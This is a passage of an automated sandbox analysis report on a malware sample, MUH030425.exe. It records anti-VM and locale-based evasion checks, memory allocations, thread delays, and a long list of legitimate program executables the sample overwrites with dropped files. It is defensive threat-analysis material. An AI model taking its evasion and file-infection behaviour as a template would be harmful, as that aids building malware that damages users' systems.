              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Yara detected AntiVM3
              Source: Yara matchFile source: Process Memory Space: MUH030425.exe PID: 6244, type: MEMORYSTR
              Contains functionality to behave differently if execute on a Russian/Kazak computer
              Source: C:\Windows\System32\AppVClient.exeCode function: 17_2_00B752A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 17_2_00B752A0
              Source: C:\Windows\System32\FXSSVC.exeCode function: 21_2_004252A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 21_2_004252A0
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 22_2_009952A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 22_2_009952A0
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 23_2_00C052A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 23_2_00C052A0
              Source: C:\Windows\System32\msdtc.exeCode function: 24_2_00C952A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 24_2_00C952A0
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 25_2_004C52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 25_2_004C52A0
              Source: C:\Windows\System32\Locator.exeCode function: 27_2_007452A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 27_2_007452A0
              Source: C:\Windows\System32\SensorDataService.exeCode function: 29_2_004A52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 29_2_004A52A0
              Source: C:\Windows\System32\snmptrap.exeCode function: 30_2_006C52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 30_2_006C52A0
              Source: C:\Windows\System32\Spectrum.exeCode function: 31_2_004A52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 31_2_004A52A0
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 32_2_00D752A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 32_2_00D752A0
              Source: C:\Windows\System32\TieringEngineService.exeCode function: 34_2_006D52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 34_2_006D52A0
              Source: C:\Windows\System32\AgentService.exeCode function: 36_2_00B852A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 36_2_00B852A0
              Source: C:\Windows\System32\vds.exeCode function: 37_2_00C252A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 37_2_00C252A0
              Source: C:\Windows\System32\wbengine.exeCode function: 39_2_007652A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 39_2_007652A0
              Source: C:\Users\user\Desktop\MUH030425.exeMemory allocated: 11B0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeMemory allocated: 2B50000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeMemory allocated: 11D0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeMemory allocated: 64F0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeMemory allocated: 61F0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeMemory allocated: 74F0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeMemory allocated: 84F0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeMemory allocated: 2F00000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeMemory allocated: 30C0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeMemory allocated: 50C0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeMemory allocated: 6C30000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeMemory allocated: 6830000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeMemory allocated: 7C30000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeMemory allocated: 8C30000 memory reserve | memory write watch
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00416B94 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,GetCurrentProcessId,8_2_00416B94
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3587Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3382Jump to behavior
              Source: C:\Windows\System32\msdtc.exeWindow / User API: threadDelayed 487
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7z.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXEJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\lynchtmlconv.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-console-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXEJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXEJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-string-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Windows\System32\SearchIndexer.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-util-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Install\{9DD40E31-8782-438B-BCFD-713DE1B3090F}\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\nss3.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\MSACCESS.EXEJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exeJump to dropped file
